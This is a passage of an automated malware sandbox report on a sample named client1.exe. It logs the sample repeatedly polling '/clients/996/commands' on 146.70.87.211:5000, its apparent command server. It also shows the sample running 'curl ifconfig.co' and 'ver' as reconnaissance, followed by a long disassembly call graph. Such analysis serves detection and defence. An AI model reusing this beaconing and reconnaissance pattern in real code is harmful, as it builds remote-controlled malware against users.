                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept: */*
                                                  Connection: keep-alive


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  12 | 192.168.2.8 | 49725 | 146.70.87.211 | 5000 | 6776 | C:\Users\user\Desktop\client1.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Nov 4, 2024 09:50:21.840990067 CET | 173 | OUT | GET /clients/996/commands HTTP/1.1
                                                  Host: 146.70.87.211:5000
                                                  User-Agent: python-requests/2.31.0
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept: */*
                                                  Connection: keep-alive


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  13 | 192.168.2.8 | 49726 | 146.70.87.211 | 5000 | 6776 | C:\Users\user\Desktop\client1.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Nov 4, 2024 09:50:27.485373974 CET | 173 | OUT | GET /clients/996/commands HTTP/1.1
                                                  Host: 146.70.87.211:5000
                                                  User-Agent: python-requests/2.31.0
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept: */*
                                                  Connection: keep-alive


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  14 | 192.168.2.8 | 49727 | 146.70.87.211 | 5000 | 6776 | C:\Users\user\Desktop\client1.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Nov 4, 2024 09:50:33.022425890 CET | 173 | OUT | GET /clients/996/commands HTTP/1.1
                                                  Host: 146.70.87.211:5000
                                                  User-Agent: python-requests/2.31.0
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept: */*
                                                  Connection: keep-alive


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  15 | 192.168.2.8 | 49730 | 146.70.87.211 | 5000 | 6776 | C:\Users\user\Desktop\client1.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Nov 4, 2024 09:50:38.535686016 CET | 173 | OUT | GET /clients/996/commands HTTP/1.1
                                                  Host: 146.70.87.211:5000
                                                  User-Agent: python-requests/2.31.0
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept: */*
                                                  Connection: keep-alive


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  16 | 192.168.2.8 | 49731 | 146.70.87.211 | 5000 | 6776 | C:\Users\user\Desktop\client1.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Nov 4, 2024 09:50:44.045330048 CET | 173 | OUT | GET /clients/996/commands HTTP/1.1
                                                  Host: 146.70.87.211:5000
                                                  User-Agent: python-requests/2.31.0
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept: */*
                                                  Connection: keep-alive


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  17 | 192.168.2.8 | 49732 | 146.70.87.211 | 5000 | 6776 | C:\Users\user\Desktop\client1.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Nov 4, 2024 09:50:49.561132908 CET | 173 | OUT | GET /clients/996/commands HTTP/1.1
                                                  Host: 146.70.87.211:5000
                                                  User-Agent: python-requests/2.31.0
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept: */*
                                                  Connection: keep-alive


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  18 | 192.168.2.8 | 49733 | 146.70.87.211 | 5000 | 6776 | C:\Users\user\Desktop\client1.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Nov 4, 2024 09:50:55.073851109 CET | 173 | OUT | GET /clients/996/commands HTTP/1.1
                                                  Host: 146.70.87.211:5000
                                                  User-Agent: python-requests/2.31.0
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept: */*
                                                  Connection: keep-alive


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  19 | 192.168.2.8 | 49734 | 146.70.87.211 | 5000 | 6776 | C:\Users\user\Desktop\client1.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Nov 4, 2024 09:51:00.730496883 CET | 173 | OUT | GET /clients/996/commands HTTP/1.1
                                                  Host: 146.70.87.211:5000
                                                  User-Agent: python-requests/2.31.0
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept: */*
                                                  Connection: keep-alive


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  20 | 192.168.2.8 | 49735 | 146.70.87.211 | 5000 | 6776 | C:\Users\user\Desktop\client1.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Nov 4, 2024 09:51:06.249640942 CET | 173 | OUT | GET /clients/996/commands HTTP/1.1
                                                  Host: 146.70.87.211:5000
                                                  User-Agent: python-requests/2.31.0
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept: */*
                                                  Connection: keep-alive


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  21 | 192.168.2.8 | 49736 | 146.70.87.211 | 5000 | 6776 | C:\Users\user\Desktop\client1.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Nov 4, 2024 09:51:11.765666008 CET | 173 | OUT | GET /clients/996/commands HTTP/1.1
                                                  Host: 146.70.87.211:5000
                                                  User-Agent: python-requests/2.31.0
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept: */*
                                                  Connection: keep-alive


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  22 | 192.168.2.8 | 49737 | 146.70.87.211 | 5000 | 6776 | C:\Users\user\Desktop\client1.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Nov 4, 2024 09:51:17.335611105 CET | 173 | OUT | GET /clients/996/commands HTTP/1.1
                                                  Host: 146.70.87.211:5000
                                                  User-Agent: python-requests/2.31.0
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept: */*
                                                  Connection: keep-alive


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                  23 | 192.168.2.8 | 49738 | 146.70.87.211 | 5000
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Nov 4, 2024 09:51:22.965276957 CET | 173 | OUT | GET /clients/996/commands HTTP/1.1
                                                  Host: 146.70.87.211:5000
                                                  User-Agent: python-requests/2.31.0
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept: */*
                                                  Connection: keep-alive


                                                  Target ID:0
                                                  Start time:03:49:16
                                                  Start date:04/11/2024
                                                  Path:C:\Users\user\Desktop\client1.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\Desktop\client1.exe"
                                                  Imagebase:0x7ff79f620000
                                                  File size:11'677'281 bytes
                                                  MD5 hash:950C13286D42AD2DA05B1778C1E2D747
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:false

                                                  Target ID:2
                                                  Start time:03:49:18
                                                  Start date:04/11/2024
                                                  Path:C:\Users\user\Desktop\client1.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\Desktop\client1.exe"
                                                  Imagebase:0x7ff79f620000
                                                  File size:11'677'281 bytes
                                                  MD5 hash:950C13286D42AD2DA05B1778C1E2D747
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:false

                                                  Target ID:3
                                                  Start time:03:49:19
                                                  Start date:04/11/2024
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\cmd.exe /c "curl ifconfig.co"
                                                  Imagebase:0x7ff701740000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:4
                                                  Start time:03:49:19
                                                  Start date:04/11/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6ee680000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:5
                                                  Start time:03:49:19
                                                  Start date:04/11/2024
                                                  Path:C:\Windows\System32\curl.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:curl ifconfig.co
                                                  Imagebase:0x7ff60ea90000
                                                  File size:530'944 bytes
                                                  MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate
                                                  Has exited:true

                                                  Target ID:6
                                                  Start time:03:49:20
                                                  Start date:04/11/2024
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\cmd.exe /c "ver"
                                                  Imagebase:0x7ff701740000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:7
                                                  Start time:03:49:20
                                                  Start date:04/11/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6ee680000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true


                                                    Execution Graph

                                                    Execution Coverage:10%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:16.7%
                                                    Total number of Nodes:2000
                                                    Total number of Limit Nodes:26
Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18577->18580 18581 7ff79f63a3c4 _findclose 11 API calls 18578->18581 18579->18577 18580->18568 18582 7ff79f63a780 18581->18582 18583 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18582->18583 18583->18573 18607 7ff79f641674 18584->18607 18586 7ff79f641439 18622 7ff79f641104 18586->18622 18589 7ff79f641456 18589->18520 18590 7ff79f63cacc _fread_nolock 12 API calls 18591 7ff79f641467 18590->18591 18592 7ff79f64146f 18591->18592 18594 7ff79f64147e 18591->18594 18593 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18592->18593 18593->18589 18594->18594 18629 7ff79f6417ac 18594->18629 18597 7ff79f64157a 18598 7ff79f634444 _findclose 11 API calls 18597->18598 18600 7ff79f64157f 18598->18600 18599 7ff79f6415d5 18602 7ff79f64163c 18599->18602 18640 7ff79f640f34 18599->18640 18603 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18600->18603 18601 7ff79f641594 18601->18599 18604 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18601->18604 18606 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18602->18606 18603->18589 18604->18599 18606->18589 18608 7ff79f641697 18607->18608 18609 7ff79f6416a1 18608->18609 18655 7ff79f63f788 EnterCriticalSection 18608->18655 18612 7ff79f641713 18609->18612 18614 7ff79f63920c _CreateFrameInfo 45 API calls 18609->18614 18612->18586 18616 7ff79f64172b 18614->18616 18618 7ff79f641782 18616->18618 18619 7ff79f63a6f4 50 API calls 18616->18619 18618->18586 18620 7ff79f64176c 18619->18620 18621 7ff79f641404 65 API calls 18620->18621 18621->18618 18623 7ff79f634a1c 45 API calls 18622->18623 18624 7ff79f641118 18623->18624 18625 7ff79f641136 18624->18625 18626 7ff79f641124 GetOEMCP 18624->18626 18627 7ff79f64113b GetACP 18625->18627 18628 7ff79f64114b 18625->18628 18626->18628 18627->18628 18628->18589 18628->18590 18630 7ff79f641104 47 API calls 
18629->18630 18631 7ff79f6417d9 18630->18631 18632 7ff79f641816 IsValidCodePage 18631->18632 18638 7ff79f64192f 18631->18638 18639 7ff79f641830 memcpy_s 18631->18639 18634 7ff79f641827 18632->18634 18632->18638 18633 7ff79f62ad80 _wfindfirst32i64 8 API calls 18635 7ff79f641571 18633->18635 18636 7ff79f641856 GetCPInfo 18634->18636 18634->18639 18635->18597 18635->18601 18636->18638 18636->18639 18638->18633 18656 7ff79f64121c 18639->18656 18727 7ff79f63f788 EnterCriticalSection 18640->18727 18657 7ff79f641259 GetCPInfo 18656->18657 18666 7ff79f64134f 18656->18666 18663 7ff79f64126c 18657->18663 18657->18666 18658 7ff79f62ad80 _wfindfirst32i64 8 API calls 18659 7ff79f6413ee 18658->18659 18659->18638 18667 7ff79f641f60 18663->18667 18665 7ff79f646f04 54 API calls 18665->18666 18666->18658 18668 7ff79f634a1c 45 API calls 18667->18668 18669 7ff79f641fa2 18668->18669 18670 7ff79f63e7f0 _fread_nolock MultiByteToWideChar 18669->18670 18671 7ff79f641fd8 18670->18671 18672 7ff79f641fdf 18671->18672 18673 7ff79f64209c 18671->18673 18674 7ff79f63cacc _fread_nolock 12 API calls 18671->18674 18678 7ff79f642008 memcpy_s 18671->18678 18675 7ff79f62ad80 _wfindfirst32i64 8 API calls 18672->18675 18673->18672 18677 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18673->18677 18674->18678 18676 7ff79f6412e3 18675->18676 18682 7ff79f646f04 18676->18682 18677->18672 18678->18673 18679 7ff79f63e7f0 _fread_nolock MultiByteToWideChar 18678->18679 18680 7ff79f64207e 18679->18680 18680->18673 18681 7ff79f642082 GetStringTypeW 18680->18681 18681->18673 18683 7ff79f634a1c 45 API calls 18682->18683 18684 7ff79f646f29 18683->18684 18687 7ff79f646bd0 18684->18687 18688 7ff79f646c11 18687->18688 18689 7ff79f63e7f0 _fread_nolock MultiByteToWideChar 18688->18689 18692 7ff79f646c5b 18689->18692 18690 7ff79f646ed9 18691 7ff79f62ad80 _wfindfirst32i64 8 API calls 18690->18691 18693 7ff79f641316 18691->18693 18692->18690 18694 7ff79f63cacc _fread_nolock 12 API calls 
18692->18694 18696 7ff79f646c93 18692->18696 18707 7ff79f646d91 18692->18707 18693->18665 18694->18696 18695 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18695->18690 18697 7ff79f63e7f0 _fread_nolock MultiByteToWideChar 18696->18697 18696->18707 18698 7ff79f646d06 18697->18698 18698->18707 18718 7ff79f63e18c 18698->18718 18701 7ff79f646d51 18704 7ff79f63e18c __crtLCMapStringW 6 API calls 18701->18704 18701->18707 18702 7ff79f646da2 18703 7ff79f63cacc _fread_nolock 12 API calls 18702->18703 18705 7ff79f646e74 18702->18705 18706 7ff79f646dc0 18702->18706 18703->18706 18704->18707 18705->18707 18708 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18705->18708 18706->18707 18709 7ff79f63e18c __crtLCMapStringW 6 API calls 18706->18709 18707->18690 18707->18695 18708->18707 18710 7ff79f646e40 18709->18710 18710->18705 18711 7ff79f646e60 18710->18711 18712 7ff79f646e76 18710->18712 18713 7ff79f63f0b8 WideCharToMultiByte 18711->18713 18714 7ff79f63f0b8 WideCharToMultiByte 18712->18714 18715 7ff79f646e6e 18713->18715 18714->18715 18715->18705 18716 7ff79f646e8e 18715->18716 18716->18707 18717 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18716->18717 18717->18707 18719 7ff79f63ddb8 __crtLCMapStringW 5 API calls 18718->18719 18720 7ff79f63e1ca 18719->18720 18721 7ff79f63e1d2 18720->18721 18724 7ff79f63e278 18720->18724 18721->18701 18721->18702 18721->18707 18723 7ff79f63e23b LCMapStringW 18723->18721 18725 7ff79f63ddb8 __crtLCMapStringW 5 API calls 18724->18725 18726 7ff79f63e2a6 __crtLCMapStringW 18725->18726 18726->18723 18729 7ff79f6456c9 18728->18729 18730 7ff79f6456e0 18728->18730 18731 7ff79f634444 _findclose 11 API calls 18729->18731 18730->18729 18733 7ff79f6456ee 18730->18733 18732 7ff79f6456ce 18731->18732 18734 7ff79f639db0 _invalid_parameter_noinfo 37 API calls 18732->18734 18735 7ff79f634a1c 45 API calls 18733->18735 18736 7ff79f6456d9 18733->18736 18734->18736 18735->18736 
18736->18417 18738 7ff79f634a1c 45 API calls 18737->18738 18739 7ff79f6483ad 18738->18739 18742 7ff79f648004 18739->18742 18745 7ff79f648052 18742->18745 18743 7ff79f62ad80 _wfindfirst32i64 8 API calls 18744 7ff79f646585 18743->18744 18744->18417 18744->18422 18746 7ff79f6480d9 18745->18746 18748 7ff79f6480c4 GetCPInfo 18745->18748 18751 7ff79f6480dd 18745->18751 18747 7ff79f63e7f0 _fread_nolock MultiByteToWideChar 18746->18747 18746->18751 18749 7ff79f648171 18747->18749 18748->18746 18748->18751 18750 7ff79f63cacc _fread_nolock 12 API calls 18749->18750 18749->18751 18752 7ff79f6481a8 18749->18752 18750->18752 18751->18743 18752->18751 18753 7ff79f63e7f0 _fread_nolock MultiByteToWideChar 18752->18753 18754 7ff79f648216 18753->18754 18755 7ff79f6482f8 18754->18755 18756 7ff79f63e7f0 _fread_nolock MultiByteToWideChar 18754->18756 18755->18751 18757 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18755->18757 18758 7ff79f64823c 18756->18758 18757->18751 18758->18755 18759 7ff79f63cacc _fread_nolock 12 API calls 18758->18759 18760 7ff79f648269 18758->18760 18759->18760 18760->18755 18761 7ff79f63e7f0 _fread_nolock MultiByteToWideChar 18760->18761 18762 7ff79f6482e0 18761->18762 18763 7ff79f6482e6 18762->18763 18764 7ff79f648300 18762->18764 18763->18755 18766 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18763->18766 18771 7ff79f63e010 18764->18771 18766->18755 18768 7ff79f64833f 18768->18751 18770 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18768->18770 18769 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18769->18768 18770->18751 18772 7ff79f63ddb8 __crtLCMapStringW 5 API calls 18771->18772 18773 7ff79f63e04e 18772->18773 18774 7ff79f63e278 __crtLCMapStringW 5 API calls 18773->18774 18776 7ff79f63e056 18773->18776 18775 7ff79f63e0bf CompareStringW 18774->18775 18775->18776 18776->18768 18776->18769 18778 7ff79f646fda HeapSize 18777->18778 18779 
7ff79f646fc1 18777->18779 18780 7ff79f634444 _findclose 11 API calls 18779->18780 18781 7ff79f646fc6 18780->18781 18782 7ff79f639db0 _invalid_parameter_noinfo 37 API calls 18781->18782 18783 7ff79f646fd1 18782->18783 18783->18427 18785 7ff79f63f9ab 18784->18785 18786 7ff79f63f9a1 18784->18786 18788 7ff79f63f9b0 18785->18788 18794 7ff79f63f9b7 _findclose 18785->18794 18787 7ff79f63cacc _fread_nolock 12 API calls 18786->18787 18792 7ff79f63f9a9 18787->18792 18789 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18788->18789 18789->18792 18790 7ff79f63f9ea HeapReAlloc 18790->18792 18790->18794 18791 7ff79f63f9bd 18793 7ff79f634444 _findclose 11 API calls 18791->18793 18792->18431 18793->18792 18794->18790 18794->18791 18795 7ff79f6426b0 _findclose 2 API calls 18794->18795 18795->18794 18797 7ff79f63807d 18796->18797 18798 7ff79f638079 18796->18798 18817 7ff79f641b7c GetEnvironmentStringsW 18797->18817 18798->18470 18809 7ff79f638424 18798->18809 18801 7ff79f63808a 18804 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18801->18804 18802 7ff79f638096 18824 7ff79f6381e4 18802->18824 18804->18798 18806 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18807 7ff79f6380bd 18806->18807 18808 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18807->18808 18808->18798 18810 7ff79f638447 18809->18810 18815 7ff79f63845e 18809->18815 18810->18470 18811 7ff79f63e7f0 MultiByteToWideChar _fread_nolock 18811->18815 18812 7ff79f63dd40 _findclose 11 API calls 18812->18815 18813 7ff79f6384d2 18814 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18813->18814 18814->18810 18815->18810 18815->18811 18815->18812 18815->18813 18816 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18815->18816 18816->18815 18818 7ff79f641ba0 18817->18818 18819 7ff79f638082 18817->18819 18820 7ff79f63cacc _fread_nolock 12 API calls 18818->18820 18819->18801 
18819->18802 18822 7ff79f641bd7 memcpy_s 18820->18822 18821 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18823 7ff79f641bf7 FreeEnvironmentStringsW 18821->18823 18822->18821 18823->18819 18826 7ff79f63820c 18824->18826 18825 7ff79f63dd40 _findclose 11 API calls 18838 7ff79f638247 18825->18838 18826->18825 18827 7ff79f63824f 18828 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18827->18828 18829 7ff79f63809e 18828->18829 18829->18806 18830 7ff79f6382c9 18831 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18830->18831 18831->18829 18832 7ff79f63dd40 _findclose 11 API calls 18832->18838 18833 7ff79f6382b8 18835 7ff79f638300 11 API calls 18833->18835 18834 7ff79f63f924 _wfindfirst32i64 37 API calls 18834->18838 18836 7ff79f6382c0 18835->18836 18839 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18836->18839 18837 7ff79f6382ec 18841 7ff79f639dd0 _wfindfirst32i64 17 API calls 18837->18841 18838->18827 18838->18830 18838->18832 18838->18833 18838->18834 18838->18837 18840 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18838->18840 18839->18827 18840->18838 18842 7ff79f6382fe 18841->18842 18844 7ff79f647f6d __crtLCMapStringW 18843->18844 18845 7ff79f64646e 18844->18845 18846 7ff79f63e010 6 API calls 18844->18846 18845->18494 18845->18495 18846->18845 17763 7ff79f634290 17764 7ff79f63429b 17763->17764 17772 7ff79f63e354 17764->17772 17785 7ff79f63f788 EnterCriticalSection 17772->17785 18938 7ff79f6496f9 18939 7ff79f649708 18938->18939 18940 7ff79f649712 18938->18940 18942 7ff79f63f7e8 LeaveCriticalSection 18939->18942 18960 7ff79f6407f0 18971 7ff79f646764 18960->18971 18972 7ff79f646771 18971->18972 18973 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18972->18973 18974 7ff79f64678d 18972->18974 18973->18972 18975 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18974->18975 18976 
7ff79f6407f9 18974->18976 18975->18974 18977 7ff79f63f788 EnterCriticalSection 18976->18977 18978 7ff79f63b9f0 18989 7ff79f63f788 EnterCriticalSection 18978->18989 17693 7ff79f62a370 17694 7ff79f62a39e 17693->17694 17695 7ff79f62a385 17693->17695 17695->17694 17697 7ff79f63cacc 12 API calls 17695->17697 17696 7ff79f62a3fc 17697->17696 18990 7ff79f6494de 18991 7ff79f6494ee 18990->18991 18994 7ff79f6342f8 LeaveCriticalSection 18991->18994 14686 7ff79f63e8dc 14687 7ff79f63eace 14686->14687 14689 7ff79f63e91e _isindst 14686->14689 14739 7ff79f634444 14687->14739 14689->14687 14692 7ff79f63e99e _isindst 14689->14692 14707 7ff79f6453b4 14692->14707 14697 7ff79f63eafa 14751 7ff79f639dd0 IsProcessorFeaturePresent 14697->14751 14704 7ff79f63e9fb 14706 7ff79f63eabe 14704->14706 14732 7ff79f6453f8 14704->14732 14742 7ff79f62ad80 14706->14742 14708 7ff79f63e9bc 14707->14708 14709 7ff79f6453c3 14707->14709 14714 7ff79f6447b8 14708->14714 14755 7ff79f63f788 EnterCriticalSection 14709->14755 14715 7ff79f6447c1 14714->14715 14719 7ff79f63e9d1 14714->14719 14716 7ff79f634444 _findclose 11 API calls 14715->14716 14717 7ff79f6447c6 14716->14717 14756 7ff79f639db0 14717->14756 14719->14697 14720 7ff79f6447e8 14719->14720 14721 7ff79f63e9e2 14720->14721 14722 7ff79f6447f1 14720->14722 14721->14697 14726 7ff79f644818 14721->14726 14723 7ff79f634444 _findclose 11 API calls 14722->14723 14724 7ff79f6447f6 14723->14724 14725 7ff79f639db0 _invalid_parameter_noinfo 37 API calls 14724->14725 14725->14721 14727 7ff79f63e9f3 14726->14727 14728 7ff79f644821 14726->14728 14727->14697 14727->14704 14729 7ff79f634444 _findclose 11 API calls 14728->14729 14730 7ff79f644826 14729->14730 14731 7ff79f639db0 _invalid_parameter_noinfo 37 API calls 14730->14731 14731->14727 14837 7ff79f63f788 EnterCriticalSection 14732->14837 14838 7ff79f63a798 GetLastError 14739->14838 14741 7ff79f63444d 14741->14706 14743 7ff79f62ad89 14742->14743 14744 7ff79f62ad94 14743->14744 14745 7ff79f62ae40 
IsProcessorFeaturePresent 14743->14745 14746 7ff79f62ae58 14745->14746 14855 7ff79f62b034 RtlCaptureContext 14746->14855 14752 7ff79f639de3 14751->14752 14860 7ff79f639ae4 14752->14860 14758 7ff79f639c48 14756->14758 14759 7ff79f639c73 14758->14759 14762 7ff79f639ce4 14759->14762 14761 7ff79f639c9a 14770 7ff79f639a2c 14762->14770 14767 7ff79f639d1f 14767->14761 14768 7ff79f639dd0 _wfindfirst32i64 17 API calls 14769 7ff79f639daf 14768->14769 14771 7ff79f639a48 GetLastError 14770->14771 14772 7ff79f639a83 14770->14772 14773 7ff79f639a58 14771->14773 14772->14767 14776 7ff79f639a98 14772->14776 14779 7ff79f63a860 14773->14779 14777 7ff79f639acc 14776->14777 14778 7ff79f639ab4 GetLastError SetLastError 14776->14778 14777->14767 14777->14768 14778->14777 14780 7ff79f63a89a FlsSetValue 14779->14780 14781 7ff79f63a87f FlsGetValue 14779->14781 14782 7ff79f63a8a7 14780->14782 14785 7ff79f639a73 SetLastError 14780->14785 14783 7ff79f63a894 14781->14783 14781->14785 14796 7ff79f63dd40 14782->14796 14783->14780 14785->14772 14787 7ff79f63a8d4 FlsSetValue 14790 7ff79f63a8f2 14787->14790 14791 7ff79f63a8e0 FlsSetValue 14787->14791 14788 7ff79f63a8c4 FlsSetValue 14789 7ff79f63a8cd 14788->14789 14803 7ff79f639e18 14789->14803 14809 7ff79f63a3c4 14790->14809 14791->14789 14797 7ff79f63dd51 _findclose 14796->14797 14798 7ff79f63dda2 14797->14798 14799 7ff79f63dd86 HeapAlloc 14797->14799 14814 7ff79f6426b0 14797->14814 14801 7ff79f634444 _findclose 10 API calls 14798->14801 14799->14797 14800 7ff79f63a8b6 14799->14800 14800->14787 14800->14788 14801->14800 14804 7ff79f639e1d RtlFreeHeap 14803->14804 14805 7ff79f639e4c 14803->14805 14804->14805 14806 7ff79f639e38 GetLastError 14804->14806 14805->14785 14807 7ff79f639e45 Concurrency::details::SchedulerProxy::DeleteThis 14806->14807 14808 7ff79f634444 _findclose 9 API calls 14807->14808 14808->14805 14823 7ff79f63a29c 14809->14823 14817 7ff79f6426f0 14814->14817 14822 7ff79f63f788 EnterCriticalSection 14817->14822 14835 7ff79f63f788 
EnterCriticalSection 14823->14835 14839 7ff79f63a7d9 FlsSetValue 14838->14839 14840 7ff79f63a7bc 14838->14840 14841 7ff79f63a7eb 14839->14841 14852 7ff79f63a7c9 14839->14852 14840->14839 14840->14852 14843 7ff79f63dd40 _findclose 5 API calls 14841->14843 14842 7ff79f63a845 SetLastError 14842->14741 14844 7ff79f63a7fa 14843->14844 14845 7ff79f63a818 FlsSetValue 14844->14845 14846 7ff79f63a808 FlsSetValue 14844->14846 14848 7ff79f63a836 14845->14848 14849 7ff79f63a824 FlsSetValue 14845->14849 14847 7ff79f63a811 14846->14847 14850 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 14847->14850 14851 7ff79f63a3c4 _findclose 5 API calls 14848->14851 14849->14847 14850->14852 14853 7ff79f63a83e 14851->14853 14852->14842 14854 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 14853->14854 14854->14842 14856 7ff79f62b04e RtlLookupFunctionEntry 14855->14856 14857 7ff79f62ae6b 14856->14857 14858 7ff79f62b064 RtlVirtualUnwind 14856->14858 14859 7ff79f62ae00 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 14857->14859 14858->14856 14858->14857 14861 7ff79f639b1e _wfindfirst32i64 memcpy_s 14860->14861 14862 7ff79f639b46 RtlCaptureContext RtlLookupFunctionEntry 14861->14862 14863 7ff79f639b80 RtlVirtualUnwind 14862->14863 14864 7ff79f639bb6 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 14862->14864 14863->14864 14865 7ff79f639c08 _wfindfirst32i64 14864->14865 14866 7ff79f62ad80 _wfindfirst32i64 8 API calls 14865->14866 14867 7ff79f639c27 GetCurrentProcess TerminateProcess 14866->14867 17877 7ff79f649664 17880 7ff79f6342f8 LeaveCriticalSection 17877->17880 18124 7ff79f638a50 18127 7ff79f6389d0 18124->18127 18134 7ff79f63f788 EnterCriticalSection 18127->18134 19073 7ff79f62b0b0 19074 7ff79f62b0c0 19073->19074 19090 7ff79f63579c 19074->19090 19076 7ff79f62b0cc 19096 7ff79f62b3b8 19076->19096 19078 7ff79f62b69c 7 API calls 19079 7ff79f62b165 19078->19079 19080 7ff79f62b0e4 
